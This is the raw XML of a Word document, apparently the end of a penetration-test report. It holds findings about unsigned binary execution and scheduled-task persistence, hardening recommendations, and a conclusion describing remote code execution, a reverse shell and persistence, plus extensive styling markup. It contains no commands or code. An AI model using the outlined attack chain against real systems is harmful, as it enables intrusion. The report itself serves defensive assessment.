    <w:p w14:paraId="12749A72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Lack of monitoring allowed execution of unsigned binaries (backdoor.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30987B79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Windows scheduled tasks could be abused for persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073A0253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 w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc26367"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="0E902EC7"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Restrict SMB access – Disable writable shares for non-essential users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C268DFE"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Implement least privilege – Remove administrative rights from regular accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D688780"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Application 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>white-listing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– Prevent execution of unauthorized binaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A1961D"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Monitor scheduled tasks – Detect abnormal persistence mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF568D7"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Network monitoring – Block and alert on reverse shell traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146D495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 w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc20436"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="5480FA0A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The engagement successfully demonstrated how an attacker can exploit weak access controls to gain remote code execution, establish a reverse shell, and maintain persistence on the target system. Proper hardening of administrative access, monitoring of scheduled tasks, and application execution policies are recommended to mitigate such attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D229A95">
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD08F83">
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE978A8">
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118419A5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3EC16560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4B65AD19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0990074A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77C4BEC4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6368A9B9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246EBF56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15D0376C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6BD97848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61272F0A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00A0068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default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="576" w:footer="43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Kufi Extended Outline">
    <w:panose1 w:val="04010401010101010101"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00006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jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:pict>
        <v:rect id="_x0000_i1037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 w14:paraId="0000002F"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D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-671195</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-281305</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7788275" cy="1024255"/>
          <wp:effectExtent l="0" t="0" r="14605" b="12065"/>
          <wp:wrapTopAndBottom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7788275" cy="1023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1AEE9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0341AEE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04F7B257"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04F7B2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3D33CE66"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3D33CE6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540007E7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="540007E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7CFCC43E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7CFCC43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D019E4"/>
    <w:rsid w:val="02017B58"/>
    <w:rsid w:val="023625B0"/>
    <w:rsid w:val="083D1794"/>
    <w:rsid w:val="08C94FF8"/>
    <w:rsid w:val="0C203DF5"/>
    <w:rsid w:val="0E880A3A"/>
    <w:rsid w:val="0E9512FB"/>
    <w:rsid w:val="16393EB4"/>
    <w:rsid w:val="166455C7"/>
    <w:rsid w:val="19C36488"/>
    <w:rsid w:val="1B217891"/>
    <w:rsid w:val="1E93319C"/>
    <w:rsid w:val="213F068F"/>
    <w:rsid w:val="21B95DF1"/>
    <w:rsid w:val="229F7A26"/>
    <w:rsid w:val="25700DFA"/>
    <w:rsid w:val="2BB07A36"/>
    <w:rsid w:val="2C067F05"/>
    <w:rsid w:val="2D3F104B"/>
    <w:rsid w:val="2ED576A0"/>
    <w:rsid w:val="30CE7FA2"/>
    <w:rsid w:val="32134DB6"/>
    <w:rsid w:val="32A23217"/>
    <w:rsid w:val="33340711"/>
    <w:rsid w:val="354074ED"/>
    <w:rsid w:val="356928AF"/>
    <w:rsid w:val="40313E05"/>
    <w:rsid w:val="408F05F9"/>
    <w:rsid w:val="41C67479"/>
    <w:rsid w:val="42BE2BE5"/>
    <w:rsid w:val="451B3B9E"/>
    <w:rsid w:val="49E1738F"/>
    <w:rsid w:val="4BB77389"/>
    <w:rsid w:val="4DEC4CE8"/>
    <w:rsid w:val="4EC85950"/>
    <w:rsid w:val="4F1D2E5C"/>
    <w:rsid w:val="50770CC7"/>
    <w:rsid w:val="597E7B62"/>
    <w:rsid w:val="59BE7110"/>
    <w:rsid w:val="5B21121A"/>
    <w:rsid w:val="5D17062D"/>
    <w:rsid w:val="61F26C63"/>
    <w:rsid w:val="624A4733"/>
    <w:rsid w:val="661A0911"/>
    <w:rsid w:val="6AE17565"/>
    <w:rsid w:val="6BE73308"/>
    <w:rsid w:val="708966DF"/>
    <w:rsid w:val="716F4C2B"/>
    <w:rsid w:val="73B629EC"/>
    <w:rsid w:val="75DB288E"/>
    <w:rsid w:val="76101441"/>
    <w:rsid w:val="76FA5DB4"/>
    <w:rsid w:val="7CA10480"/>
    <w:rsid w:val="7D084EB2"/>
    <w:rsid w:val="7D274676"/>
    <w:rsid w:val="7D6E2658"/>
    <w:rsid w:val="7DE46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50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="24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50" w:after="50"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b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link w:val="28"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:after="50"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
      <w:szCs w:val="24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spacing w:before="50" w:after="50"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:i/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8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun"/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="24"/>
      <w:u w:val="single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8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2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21">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/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table" w:customStyle="1" w:styleId="23">
    <w:name w:val="TableNormal"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="WPSOffice手动目录 1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table" w:customStyle="1" w:styleId="27">
    <w:name w:val="_Style 12"/>
    <w:basedOn w:val="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Heading 4 Char"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="Heading 5 Char"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b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603</Words>
  <Characters>3665</Characters>
  <TotalTime>40</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4330</CharactersWithSpaces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2025-07-26T00:07:00Z</dcterms:created>
  <dc:creator>Mohammed</dc:creator>
  <cp:lastModifiedBy>For Google</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-08T08:46:44Z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FA4918FCF5FA42D497C2E7495B85A9B1_13</vt:lpwstr>
  </property>
</Properties>
</file>